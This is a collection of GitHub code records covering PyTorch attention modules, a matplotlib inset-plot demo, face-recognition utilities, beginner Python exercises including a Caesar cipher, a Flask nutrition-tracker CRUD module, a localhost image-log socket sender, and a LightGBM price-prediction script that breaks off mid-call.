= nn.Linear(in_features=num_hidden, out_features=embedding_dim)\n self.output_softmax_scores = nn.Softmax(dim=-1)\n\n def forward(self, input_sequence, query_vector):\n if self.additive:\n s = additive_fn(x=input_sequence, q=query_vector, linear_x=self.linear_x,\n linear_q=self.linear_q, num_hidden=self.num_hidden, activation=self.activation,\n out_linear=self.out_linear)\n else:\n s = multiplicative_fn(x=input_sequence, q=query_vector, linear_x=self.linear_x,\n linear_q=self.linear_q)\n\n prob_distribution = self.output_softmax_scores(s)\n score_vectors = torch.sum(torch.bmm(prob_distribution, input_sequence))\n if self.save_attention:\n if self.attention_dict is not None and self.name is not None:\n self.attention_dict[self.name] = prob_distribution\n return score_vectors, prob_distribution\n\n # Weights Initialization\n def init_weights(self, init_range=0.1):\n self.linear_x.weight.data.uniform_(-init_range, init_range)\n self.linear_q.weight.data.uniform_(-init_range, init_range)\n self.out_linear.weight.data.uniform_(-init_range, init_range)\n\n\nclass 
SelfAttention(nn.Module):\n \"\"\"\n The Self Attention module produces context-aware representations by\n exploring the dependency between two tokens xi and xj from the same sequence x.\n\n \"\"\"\n def __init__(self, input_dim, embedding_dim, query_dim, num_hidden,\n output_features, activation, use_additive=True,\n token2token=True, seq2token=False, attention_dict=None,\n save_attention=False, name=None):\n \"\"\"\n\n :param input_dim:\n :param embedding_dim:\n :param query_dim:\n :param num_hidden:\n :param activation:\n :param use_additive:\n :param token2token:\n :param seq2token:\n \"\"\"\n super(SelfAttention, self).__init__()\n self.token2token = token2token\n self.seq2token = seq2token\n self.input_dim = input_dim\n self.embedding_dim = embedding_dim\n self.query_dim = query_dim\n self.num_hidden = num_hidden\n self.out_features = output_features\n self.activation = activation\n self.additive = use_additive\n self.attention_dict = attention_dict\n self.save_attention = save_attention\n self.name = name\n\n # Define the linear layers\n self.linear_x = nn.Linear(in_features=self.embedding_dim, out_features=self.num_hidden)\n self.linear_q = nn.Linear(in_features=self.query_dim, out_features=self.num_hidden)\n self.out_linear = nn.Linear(in_features=self.num_hidden, out_features=self.out_features)\n self.softmax_probs = nn.Softmax(dim=-1)\n\n def forward(self, input_sequence):\n # In this case the query vector itself is the input sequence\n\n # Dimensions of the vectors\n # Input Dimension -> B x Seq Length x embedding_dim\n # Query Vector Dimension -> B x Seq Length x embedding_dim\n\n x = input_sequence\n query_vector = input_sequence\n\n # Dimension of x and query after linear_x and linear_q respectively\n # B x Seq Length x hidden_dim\n x_ = self.linear_x(x)\n q_ = self.linear_q(query_vector)\n\n t = F.relu(x_ + q_)\n\n # Dimension of t after out_linear\n # B x Seq Length x embedding_dim\n o = self.out_linear(t)\n\n # Softmax Scores\n scores = self.softmax_probs(o)\n # Dimension of expectation of the sampling\n # B x seq length (Contrary to the paper, we are summing along the embedding dimension)\n expectation_of_sampling = torch.sum(torch.mul(scores, input_sequence), dim=-1)\n\n if self.save_attention:\n if self.attention_dict is not None and self.name is not None:\n self.attention_dict[self.name] = scores\n\n return scores, expectation_of_sampling\n\n # Weights Initialization\n def init_weights(self, init_range=0.1):\n self.linear_x.weight.data.uniform_(-init_range, init_range)\n self.linear_q.weight.data.uniform_(-init_range, init_range)\n self.out_linear.weight.data.uniform_(-init_range, init_range)\n\n\nclass GoalNetwork(nn.Module):\n \"\"\"\n This network uses the self, multi and vanilla attention modules and returns the\n top n vectors according to the softmax probabilities.\n \"\"\"\n\n def __init__(self, input_dim, query_dim, embedding_dim, num_hidden,\n output_features, activation, use_additive, use_token2token,\n use_self_attn, save_attention=False, attention_dict=None,\n use_multi_attn=False):\n \"\"\"\n\n :param input_dim:\n :param query_dim:\n :param embedding_dim:\n :param num_hidden:\n :param output_features:\n :param activation:\n :param use_additive:\n :param use_token2token:\n :param use_self_attn:\n :param save_attention:\n :param attention_dict:\n \"\"\"\n super(GoalNetwork, self).__init__()\n self.input_dim = input_dim\n self.query_dim = query_dim\n self.embedding_dim = embedding_dim\n self.num_hidden = num_hidden\n self.output_features = output_features\n self.activation =
 activation\n self.additive = use_additive\n self.use_self_attn = use_self_attn\n self.token2token = use_token2token\n self.save_attn = save_attention\n self.attention_dict = attention_dict\n self.multi_attn = use_multi_attn\n self.self_attn = None\n self.self_linear = None\n\n if self.use_self_attn:\n self.self_attn = SelfAttention(input_dim=self.input_dim, embedding_dim=self.embedding_dim,\n query_dim=self.query_dim, num_hidden=self.num_hidden,\n output_features=self.embedding_dim, activation=self.activation,\n use_additive=self.additive, token2token=self.token2token,\n save_attention=self.save_attn, attention_dict=self.attention_dict,\n name='SelfAttention')\n self.self_linear = nn.Linear(in_features=1, out_features=self.num_hidden)\n\n if self.multi_attn:\n # Use multi dimensional attention\n self.attn = MultiAttention(input_dim=self.input_dim, embedding_dim=self.embedding_dim,\n query_dim=self.query_dim, num_hidden=self.num_hidden,\n output_features=self.embedding_dim, activation=self.activation,\n use_additive=self.additive,\n save_attention=self.save_attn, attention_dict=self.attention_dict,\n name='MultiAttention')\n\n else:\n # Use the traditional vanilla attention\n self.attn = VanillaAttention(input_dim=self.input_dim, embedding_dim=self.embedding_dim,\n query_dim=self.query_dim, num_hidden=self.num_hidden,\n output_features=1, activation=self.activation,\n use_additive=self.additive,\n save_attention=self.save_attn, attention_dict=self.attention_dict,\n name='VanillaAttention')\n\n self.linear_attn = nn.Linear(in_features=1, out_features=self.num_hidden)\n self.output_linear = nn.Linear(in_features=num_hidden, out_features=1)\n\n def forward(self, input_sequence, current_embedding):\n scores_self, expectations_self = None, None\n if self.self_attn is not None:\n scores_self, expectations_self = self.self_attn(input_sequence)\n scores, expectation = self.attn(input_sequence, current_embedding)\n if expectations_self is not None and self.self_linear is not None:\n expectations_self = self.self_linear(expectations_self)\n expectation = self.linear_attn(expectation)\n if expectations_self is not None:\n e = expectation + expectations_self\n else:\n e = expectation\n e = self.activation(e)\n o = self.output_linear(e)\n return o\n\n\n\n\n\n","repo_name":"navneet-nmk/pytorch-rl","sub_path":"models/attention.py","file_name":"attention.py","file_ext":"py","file_size_in_byte":14735,"program_lang":"python","lang":"en","doc_type":"code","stars":438,"dataset":"github-code","pt":"51"} +{"seq_id":"2173185018","text":"#!/usr/bin/env python3\n# encoding: utf-8\nimport matplotlib.pyplot as plt\n\n\"\"\"\nPlot inside a plot\nhttps://morvanzhou.github.io/tutorials/data-manipulation/plt/4-3-plot-in-plot/\n\"\"\"\n# Main (large) plot\nfig = plt.figure()\nx = [1, 2, 3, 4, 5, 6, 7]\ny = [1, 3, 4, 2, 5, 8, 6]\n# All four values are fractions of the whole figure's coordinate system. Here, if the figure were 10x10, the main axes would start at (1, 1) and span a width of 8 and a height of 8\nleft, bottom, width, height = 0.1, 0.1, 0.8, 0.8\nax1 = fig.add_axes([left, bottom, width, height])\nax1.plot(x, y, 'r')\nax1.set_xlabel('x')\nax1.set_ylabel('y')\nax1.set_title('title')\n\n# Inset (small) plot\nleft, bottom, width, height = 0.2, 0.6, 0.25, 0.25\nax2 = fig.add_axes([left, bottom, width, height])\nax2.plot(x, y, 'b')\nax2.set_xlabel('x')\nax2.set_ylabel('y')\nax2.set_title('title inside 1')\n\nplt.axes([0.6, 0.2, 0.25, 0.25])\nplt.plot(y[::-1], x, 'g') # note that y is plotted in reverse order\nplt.xlabel('x')\nplt.ylabel('y')\nplt.title('title inside 
2')\nplt.show()\n","repo_name":"wildape/PythonPractice","sub_path":"plt/4_3_plot_in_plot.py","file_name":"4_3_plot_in_plot.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"4290392482","text":"import os\nimport configparser\n\nROOT_PATH = '/home/mnk/MegNav/Projects/Face-Recognition-from-crowd'\n\n\ndef path2src(path, num=0):\n ext = path.split(\".\")[-1]\n if ext == \"mp4\" or ext == \"avi\":\n return \"video\"\n elif ext == \"jpg\" or ext == \"png\":\n return \"image\"\n elif path == \"live\":\n if num==1:\n return 0\n return \"live\"\n else:\n raise Exception(\"Invalid source\")\n\ndef absolute_path(path):\n return os.path.abspath(path)\n\n# Congifuration file\ndef config_parse(txt):\n config = configparser.ConfigParser()\n path = ROOT_PATH + '/project.cfg'\n config.read(path)\n params={}\n try:\n for key, value in config[txt].items():\n if 'path' in key: \n params[key] = absolute_path(value)\n else:\n params[key] = value\n except KeyError as e:\n print(\"Invalid key: \", e)\n print(path) \n \n return params\n\ndef lists_equal(list1, list2):\n if len(list1) != len(list2):\n return False\n for i in range(len(list1)):\n if list1[i] != list2[i]:\n return False\n return True\n\ndef get_new_faces(list1, list2):\n new_faces = []\n for i in range(len(list1)):\n if list1[i] not in list2:\n new_faces.append(int(list1[i]))\n return new_faces\n","repo_name":"NavinKumarMNK/Face-Recognition-From-Crowd","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"51"} +{"seq_id":"71321707037","text":"# Funções aprofundadas em Python\ndef leiaInt(msg):\n while True:\n try:\n n = int(input(msg))\n except (ValueError, TypeError):\n print('\\033[31mERRO! Por favor, digite um número inteiro válido.\\033[m')\n continue\n except KeyboardInterrupt:\n print('\\033[31mUsuário interrompeu a execução.\\033[m')\n return 0\n else:\n return n\n\n\ndef leiaFloat(msg):\n while True:\n try:\n n = float(input(msg))\n except (ValueError, TypeError):\n print('\\033[31mERRO! 
Por favor, digite um número real válido.\\033[m')\n continue\n except KeyboardInterrupt:\n print('\\033[31mUsuário interrompeu a execução.\\033[m')\n return 0\n else:\n return n\n\n\nnum = leiaInt('Digite um número inteiro: ')\nvalor = leiaFloat('Digite um número real: ')\nprint(f'O valor inteiro digitado foi \\033[34m{num}\\033[m e o valor real foi \\033[34m{valor}\\033[m')\n","repo_name":"miguelmendesSerrano/curso_python","sub_path":"mundo_3/aula_23/ex113.py","file_name":"ex113.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"71330997917","text":"\"\"\" CRUD operations for meals and macros project \"\"\"\nfrom model import db, User, CaloriesMacros, Diet, Goal, Food, UserQuestions, User_tracking, UserCalculcations, Exercise, connect_to_db\n# from model import db, User, connect_to_db \n\ndef create_user(email, password, name, lname):\n \"\"\" create a new user \"\"\"\n\n user = User(email=email, password=password, name=name, lname=lname)\n\n db.session.add(user)\n db.session.commit()\n\n return user \n \ndef get_users():\n \"\"\"Return all users.\"\"\"\n\n return User.query.all()\n\n\ndef get_user_by_id(user_id):\n \"\"\"Return a user by primary key.\"\"\"\n\n return User.query.get(user_id)\n\n\ndef get_user_by_email(email):\n \"\"\"Return a user by email.\"\"\"\n\n return User.query.filter(User.email == email).first()\n\ndef get_all_food(user_id):\n \"\"\" returns all food for a user \"\"\"\n return Food.query.filter(Food.user_id == user_id).all()\n \n \ndef get_food(food_name):\n \"\"\" returns all food with the given name \"\"\"\n return Food.query.filter(Food.food_name == food_name).all()\n\ndef create_cals_macros(user, daily_caloric_intake, daily_protein_goal, daily_carb_goal, daily_fat_goal):\n\n \"\"\" create calorie and macros \"\"\"\n\n calories_and_macros = CaloriesMacros(\n user=user,\n daily_caloric_intake=daily_caloric_intake, \n daily_protein_goal=daily_protein_goal, \n daily_carb_goal=daily_carb_goal, \n daily_fat_goal=daily_fat_goal\n )\n\n db.session.add(calories_and_macros)\n db.session.commit()\n\n return calories_and_macros \n\ndef create_diet(diet, user):\n\n \"\"\" create diet preference \"\"\"\n\n diet = Diet(diet=diet, user=user)\n\n db.session.add(diet)\n db.session.commit()\n\n return diet \n\ndef create_goal(user_id, strength, running, weight_loss, consistency, stretching, high_intensity_training, nutrition, overall_health):\n\n \"\"\" create user fitness goal \"\"\"\n\n goal = Goal(\n user_id=user_id,\n strength=strength,\n running=running,\n weight_loss=weight_loss,\n consistency=consistency,\n stretching=stretching, \n high_intensity_training=high_intensity_training,\n nutrition=nutrition,\n overall_health=overall_health\n )\n\n db.session.add(goal)\n db.session.commit()\n\n return goal \n\ndef get_goals(user_id):\n \"\"\" returns all goals for a user \"\"\"\n return Goal.query.filter(Goal.user_id == user_id).all()\n\n# def create_meal(user, meal_name, meal_calories, meal_protein, meal_carb, meal_fat):\n\n# \"\"\" create user meals \"\"\"\n\n# meal = User_meals(\n# user=user, \n# meal_name=meal_name, \n# meal_calories=meal_calories, \n# meal_protein=meal_protein, \n# meal_carb=meal_carb,\n# meal_fat=meal_fat,\n# )\n\n# db.session.add(meal)\n# db.session.commit()\n\n# return meal \n\ndef create_food(food_name, calories, fat, carb, protein, user_id):\n\n \"\"\" create food for user to use for tracking \"\"\" \n\n food = Food( \n food_name=food_name,\n calories=calories,\n fat=fat,\n carb=carb,\n protein=protein, \n user_id=user_id\n )\n\n
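 # (editor's note) add() only stages the new row in the session; commit() flushes and writes it -- the same create-then-commit pattern used by create_user above\n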
 db.session.add(food)\n db.session.commit()\n\n return food\n\ndef create_tracking(user, food, deduct_daily_calories, deduct_daily_macros):\n\n \"\"\" create tracking for user to enter food throughout the day \"\"\"\n\n tracking = User_tracking(\n user=user,\n food=food,\n deduct_daily_calories=deduct_daily_calories,\n deduct_daily_macros=deduct_daily_macros,\n )\n\n db.session.add(tracking)\n db.session.commit()\n\n return tracking \n\ndef questionare(gender, age, height, weight, activity, user_id):\n\n \"\"\" questionare information \"\"\"\n\n questionare_info = UserQuestions(\n age=age,\n gender=gender,\n height=height,\n weight=weight,\n activity=activity,\n user_id=user_id\n )\n\n db.session.add(questionare_info)\n db.session.commit()\n\n return questionare_info \n\ndef new_calculator(tdee, deficit, macros, user_id, questions_id, protein_goal, fat_goal, carb_goal):\n\n \"\"\"calculate user calories and macros\"\"\"\n\n calculator_info = UserCalculcations(\n tdee=tdee,\n deficit=deficit,\n macros=macros,\n user_id=user_id,\n questions_id=questions_id,\n protein_goal=protein_goal,\n fat_goal=fat_goal,\n carb_goal=carb_goal \n )\n\n db.session.add(calculator_info)\n db.session.commit()\n\n return calculator_info \n\ndef user_exercises(exercise, user_id):\n \n \"\"\"track exercise \"\"\"\n\n exercise_info = Exercise(\n exercise=exercise, \n user_id=user_id\n )\n\n \n db.session.add(exercise_info)\n db.session.commit()\n\n return exercise_info \n\nif __name__ == '__main__':\n from server import app\n \n connect_to_db(app)\n ","repo_name":"devvynl/meals-macros-project","sub_path":"crud.py","file_name":"crud.py","file_ext":"py","file_size_in_byte":4715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"24873640406","text":"import base64\nimport cv2\nimport socket\nimport json\n\n\ndef log_sender(message: dict, port=9010):\n \"\"\"\n Send the message in JSON format to port 9010.\n \"\"\"\n\n message[\"image\"] = _cv_to_base64(message[\"image\"])\n\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n client.connect((\"localhost\", port))\n\n message_json = json.dumps(message)\n\n client.send(message_json.encode(\"utf-8\"))\n\n client.close()\n\n\ndef _cv_to_base64(img):\n _, encoded = cv2.imencode(\".jpg\", img)\n return base64.b64encode(encoded).decode(\"ascii\")\n","repo_name":"HaoriHakama/ImageLogger","sub_path":"image_receiver/log_sender.py","file_name":"log_sender.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"71871876319","text":"# Review: \r\n# Create a function called greet(). 
\r\ndef greet():\r\n# Write 3 print statements inside the function.\r\n print(\"Hello...\")\r\n print(\"How are you?\")\r\n print(\"Are you being the best version of you?\")\r\n# Call the greet() function and run your code.\r\ngreet()\r\n\r\n# Function that allows for input\r\ndef greet_with_name(name):\r\n print(f\"Hello {name}.....\")\r\n print(f\"How are you {name}?\")\r\n\r\ngreet_with_name(\"Keelen\")\r\n\r\n# Functions with more than 1 input\r\ndef greet_with(name, location):\r\n print(f\"Hello {name}\")\r\n print(f\"{name} I am from {location}, where are you from?\")\r\n\r\ngreet_with(\"Keelen\", \"Houston\")\r\n# Positional Argument, it is important to have the order of the inputs corresponding to the parameters within the function.\r\n\r\n# -------------------------------------------------------------------------------------------------------------------------\r\n\r\n# You are painting a wall. The instructions on the paint can says that 1 can of paint can cover 5 square meters of wall. Given a random height and width of wall, calculate how many cans of paint you'll need to buy.\r\nimport math\r\n\r\ndef paint_calc(height, width, cover):\r\n multi = height * width\r\n calculated = multi / cover\r\n final_cal = math.ceil(calculated)\r\n print(f\"You'll need {final_cal} cans of paint.\")\r\n\r\n\r\ntest_h = int(input(\"Height of wall: \"))\r\ntest_w = int(input(\"Width of wall: \"))\r\ncoverage = 5\r\npaint_calc(height=test_h, width=test_w, cover=coverage)\r\n\r\n# -------------------------------------------------------------------------------------------------------------------------\r\n\r\n# You need to write a function that checks whether if the number passed into it is a prime number or not.\r\n\r\n# e.g. 2 is a prime number because it's only divisible by 1 and 2.\r\n\r\n# But 4 is not a prime number because you can divide it by 1, 2 or 4.\r\n\r\n\r\ndef prime_checker(number):\r\n is_prime = True\r\n for i in range(2, number):\r\n if number % i == 0:\r\n is_prime = False\r\n if is_prime:\r\n print(\"It's a prime number.\")\r\n else:\r\n print(\"It's not a prime number.\")\r\n\r\nn = int(input(\"Check this number: \"))\r\nprime_checker(number=n)\r\n\r\n #-------------------------------------------------------------------------------------------------------------------------\r\n\r\n# Encryption Code Challenge 1\r\n\r\nalphabet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\r\n\r\ndirection = input(\"Type 'encode' to encrypt, type 'decode' to decrypt:\\n\")\r\ntext = input(\"Type your message:\\n\").lower()\r\nshift = int(input(\"Type the shift number:\\n\"))\r\n\r\n#TODO-1: Create a function called 'encrypt' that takes the 'text' and 'shift' as inputs.\r\ndef encrypt(plain_text, shift_amount):\r\n cipher_text = \"\"\r\n for letter in plain_text:\r\n position = alphabet.index(letter)\r\n new_position = position + shift_amount\r\n new_letter = alphabet[new_position]\r\n cipher_text += new_letter\r\n print(f\"The encoded text is {cipher_text}\")\r\n #TODO-2: Inside the 'encrypt' function, shift each letter of the 'text' forwards in the alphabet by the shift amount and print the encrypted text. \r\n #e.g. 
\r\n    #plain_text = \"hello\"\r\n    #shift = 5\r\n    #cipher_text = \"mjqqt\"\r\n    #print output: \"The encoded text is mjqqt\"\r\n\r\n    ##HINT: How do you get the index of an item in a list:\r\n    #https://stackoverflow.com/questions/176918/finding-the-index-of-an-item-in-a-list\r\n\r\n    ##🐛Bug alert: What happens if you try to encode the word 'civilization'?🐛\r\n\r\n#TODO-3: Call the encrypt function and pass in the user inputs. You should be able to test the code and encrypt a message.\r\nencrypt(plain_text = text, shift_amount = shift)\r\n\r\n#-------------------------------------------------------------------------------------------------------------------------\r\n\r\n# Encryption Code Challenge 2\r\n\r\nalphabet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\r\n\r\ndirection = input(\"Type 'encode' to encrypt, type 'decode' to decrypt:\\n\")\r\ntext = input(\"Type your message:\\n\").lower()\r\nshift = int(input(\"Type the shift number:\\n\"))\r\n\r\ndef encrypt(plain_text, shift_amount):\r\n    cipher_text = \"\"\r\n    for letter in plain_text:\r\n        position = alphabet.index(letter)\r\n        new_position = position + shift_amount\r\n        cipher_text += alphabet[new_position]\r\n    print(f\"The encoded text is {cipher_text}\")\r\n\r\n#TODO-1: Create a different function called 'decrypt' that takes the 'text' and 'shift' as inputs.\r\n\r\ndef decrypt(cipher_text, shift_amount):\r\n    plain_text = \"\"\r\n    for letter in cipher_text:\r\n        position = alphabet.index(letter)\r\n        new_position = position - shift_amount\r\n        plain_text += alphabet[new_position]\r\n    print(f\"The decoded text is {plain_text}\")\r\n    \r\n    #TODO-2: Inside the 'decrypt' function, shift each letter of the 'text' *backwards* in the alphabet by the shift amount and print the decrypted text. \r\n    #e.g. \r\n    #cipher_text = \"mjqqt\"\r\n    #shift = 5\r\n    #plain_text = \"hello\"\r\n    #print output: \"The decoded text is hello\"\r\n\r\n\r\n#TODO-3: Check if the user wanted to encrypt or decrypt the message by checking the 'direction' variable. Then call the correct function based on that 'direction' variable. You should be able to test the code to encrypt *AND* decrypt a message.\r\nif direction == \"encode\":\r\n    encrypt(plain_text=text, shift_amount=shift)\r\nelif direction == \"decode\":\r\n    decrypt(cipher_text = text, shift_amount = shift)\r\n\r\n#-------------------------------------------------------------------------------------------------------------------------\r\n\r\n# Encryption Code Challenge 3\r\n\r\nalphabet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\r\n\r\ndirection = input(\"Type 'encode' to encrypt, type 'decode' to decrypt:\\n\")\r\ntext = input(\"Type your message:\\n\").lower()\r\nshift = int(input(\"Type the shift number:\\n\"))\r\n\r\n#TODO-1: Combine the encrypt() and decrypt() functions into a single function called caesar(). 
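\r\n# Decoding is just encoding with the shift negated, so one caesar() function\r\n# can replace both encrypt() and decrypt(). Using the example values from TODO-2:\r\n#   caesar(start_text=\"hello\", shift_amount=5, cipher_direction=\"encode\")  # prints: The encoded text is mjqqt\r\n#   caesar(start_text=\"mjqqt\", shift_amount=5, cipher_direction=\"decode\")  # prints: The decoded text is hello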
\r\ndef caesar(start_text, shift_amount, cipher_direction):\r\n end_text = \"\"\r\n if cipher_direction == \"decode\":\r\n shift_amount *= -1\r\n for letter in start_text:\r\n position = alphabet.index(letter)\r\n new_position = position + shift_amount\r\n end_text += alphabet[new_position]\r\n print(f\"The {cipher_direction}d text is {end_text}\")\r\n\r\n#TODO-2: Call the caesar() function, passing over the 'text', 'shift' and 'direction' values.\r\ncaesar(start_text = text, shift_amount = shift, cipher_direction = direction)\r\n\r\n#-------------------------------------------------------------------------------------------------------------------------\r\n\r\n\r\n","repo_name":"Keelen-Fisher/Udemy-Python","sub_path":"Day-8/Day8.py","file_name":"Day8.py","file_ext":"py","file_size_in_byte":7111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"23685731028","text":"import time\nimport numpy as np\nimport pandas as pd\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom scipy.sparse import csr_matrix, hstack\nimport lightgbm as lgb\nfrom nltk.corpus import stopwords\nimport re\nfrom nltk.stem.porter import PorterStemmer\nimport sys\nsys.path.insert(0, '/wordbatch/')\nimport wordbatch\nfrom wordbatch.models import FTRL, FM_FTRL\nfrom wordbatch.extractors import WordBag, WordHash\n\nnotable = ['bundle', 'new', 'nwt', 'large', 'small', 'sz', 'lot', 'medium', 'xl', 'xs', 'vintage', 'nwot', 'bnwt', ]\nremove = ['for', 'and', 'vs', 'of', 'women', 'men', 'ship', 'the', 'on', 'with',\n 'in', 'one', 'boys', 'shipping', 'toddler', 'by', 'rm', 'piece', 'me', 'kids', 'fit', 'boy', 'mens', 'super',\n 'only', 'all','too', 'color', 'freeship', 'it', 'works', 'like', 'womens', 'to', 'perfect', 'woman', 'youth', 'hello', 'my',\n 'from', 'buy','go', 'is', 'at', 'wear', 'toys', 'children']\n\nstopwords = {x: 1 for x in stopwords.words('english')}\nstopwords2 = ['abcdef'] + [x for x in stopwords]\nnon_alphanums = re.compile(u'[^A-Za-z0-9]+')\n\nstemmer = PorterStemmer()\n\n\ndef rmsle(y, y0):\n assert len(y) == len(y0)\n return np.sqrt(np.mean(np.power(np.log1p(y) - np.log1p(y0), 2)))\n\n\ndef stem_tokens(tokens, stemmer):\n stemmed = []\n\n for item in tokens:\n stemmed_item = item\n try:\n stemmed_item = stemmer.stem(item)\n except Exception:\n print(\"EXCEPTION WHILE STEM\")\n print(stemmed_item)\n pass\n stemmed.append(stemmed_item)\n\n return stemmed\n\n\ndef fill_missing(df, text_cols, num_cols, bin_cols):\n for col in text_cols:\n df[col].fillna(value=\"abcdef\", inplace=True)\n for col in num_cols:\n df[col].fillna(value=df[col].mean(), inplace=True)\n for col in bin_cols:\n df[col].fillna(value=int(df[col].mean()), inplace=True)\n\n\ndef normalize_text(text):\n return u\" \".join([x for x in [y for y in non_alphanums.sub(' ', text).lower().strip().split(\" \")] if len(x) > 1 and x not in stopwords])\n\n\ndef filter_norm1(text):\n tokens = [x for x in [y for y in non_alphanums.sub(' ', text).lower().strip().split(\" \")] if\n len(x) > 1 and x not in stopwords2]\n return \" \".join(stem_tokens(tokens, stemmer))\n\n\ndef split_cat(text):\n try:\n return text.split(\"/\")\n except:\n return [\"Other\", \"Other2\", \"Other3\"]\n\n\nstart_time = time.time()\n\ntrain = pd.read_csv('train.tsv', sep='\\t')\ntest = pd.read_csv('test.tsv', sep='\\t')\nprint('[{}] Finished to load data'.format(time.time() - start_time))\nprint('Train shape: ', train.shape)\nprint('Test shape: ', test.shape)\n\nnrow_test = train.shape[0]\noutliers = 
train[(train.price < 1.0)]\ntrain = train.drop(train[(train.price < 1.0)].index)\n\ndel outliers['price']\nnrow_train = train.shape[0]\n\ny = np.log1p(train[\"price\"])\nall_data = pd.concat([train, outliers, test])\nsubmission = test[['test_id']]\n\nall_data['general_cat'], all_data['subcat_1'], all_data['subcat_2'] = zip(\n *all_data['category_name'].apply(lambda x: split_cat(x)))\nall_data.drop('category_name', axis=1, inplace=True)\n\ntext_cols = [\"name\", \"general_cat\", \"subcat_1\", \"subcat_2\", \"brand_name\", \"item_description\"]\nnum_cols = [\"item_condition_id\"]\nbin_cols = [\"shipping\"]\ntext_seq_cols = [\"name\", \"item_description\"]\n\nfill_missing(all_data, text_cols, num_cols, bin_cols)\n\nall_data[\"all_text\"] = all_data[\"brand_name\"].astype(str) + \" \" + all_data[\"name\"].astype(str) + \" \" + all_data[\n 'item_description']\nall_data[\"name_brand\"] = all_data[\"brand_name\"].astype(str) + \" \" + all_data[\"name\"].astype(str)\n\nwb = wordbatch.WordBatch(normalize_text, extractor=(WordBag, {\"hash_ngrams\": 1,\n # \"hash_ngrams_weights\": [1.5, 1.0],\n \"hash_size\": 2 ** 29,\n \"norm\": None,\n \"tf\": 'binary',\n \"idf\": None, }), procs=8)\nwb.dictionary_freeze = True\nX_all_text = wb.fit_transform(all_data['all_text'])\ndel (wb)\nX_all_text = X_all_text[:, np.array(np.clip(X_all_text.getnnz(axis=0) - 1, 0, 1), dtype=bool)]\nprint('[{}] Vectorize `all text` completed.'.format(time.time() - start_time))\nprint(X_all_text.shape)\n\nwb = wordbatch.WordBatch(filter_norm1, extractor=(WordBag, {\"hash_ngrams\": 2,\n \"hash_ngrams_weights\": [1.5, 1.0],\n \"hash_size\": 2 ** 29,\n \"norm\": None,\n \"tf\": 'binary',\n \"idf\": None, }), procs=8)\nwb.dictionary_freeze = True\nX_name3 = wb.fit_transform(all_data['name_brand'])\ndel (wb)\nX_name3 = X_name3[:, np.array(np.clip(X_name3.getnnz(axis=0) - 1, 0, 1), dtype=bool)]\nprint('[{}] Vectorize `name 2-gram` completed.'.format(time.time() - start_time))\nprint(X_name3.shape)\n\nwb = CountVectorizer()\nX_category1 = wb.fit_transform(all_data['general_cat'])\nX_category2 = wb.fit_transform(all_data['subcat_1'])\nX_category3 = wb.fit_transform(all_data['subcat_2'])\nprint('[{}] Count vectorize `categories` completed.'.format(time.time() - start_time))\n\nX_dummies = csr_matrix(pd.get_dummies(all_data[['item_condition_id', 'shipping']], sparse=True).values)\nprint('[{}] Get dummies on `item_condition_id` and `shipping` completed.'.format(time.time() - start_time))\n\ndel wb\n\nprint(X_dummies.shape, X_category1.shape, X_category2.shape, X_category3.shape, X_name3.shape, X_all_text.shape)\nsparse_merge = hstack((X_dummies, X_category1, X_category2, X_category3, X_all_text, X_name3)).tocsr() # X_brand\n\nprint('[{}] Create sparse merge completed'.format(time.time() - start_time))\n#\n# Remove features with document frequency <=1\nprint(sparse_merge.shape)\nsparse_merge = sparse_merge[:, np.where(sparse_merge.getnnz(axis=0) > 150)[0]]\nX = sparse_merge[:nrow_train]\nX_test = sparse_merge[nrow_test:]\nprint(sparse_merge.shape)\n\ny = np.log1p(train[\"price\"])\n\nparams = {\n 'learning_rate': 0.65,\n 'application': 'regression',\n 'max_depth': 4,\n 'num_leaves': 31,\n 'verbosity': -1,\n 'metric': 'RMSE',\n 'data_random_seed': 1,\n 'bagging_fraction': 0.8,\n 'bagging_freq': 500,\n 'feature_fraction': 0.8,\n 'nthread': 4,\n 'min_data_in_leaf': 100,\n 'max_bin': 31\n}\n\nd_train = lgb.Dataset(X, label=y)\n\nwatchlist = [d_train]\nmodel = lgb.train(params, train_set=d_train, num_boost_round=5500, valid_sets=watchlist, 
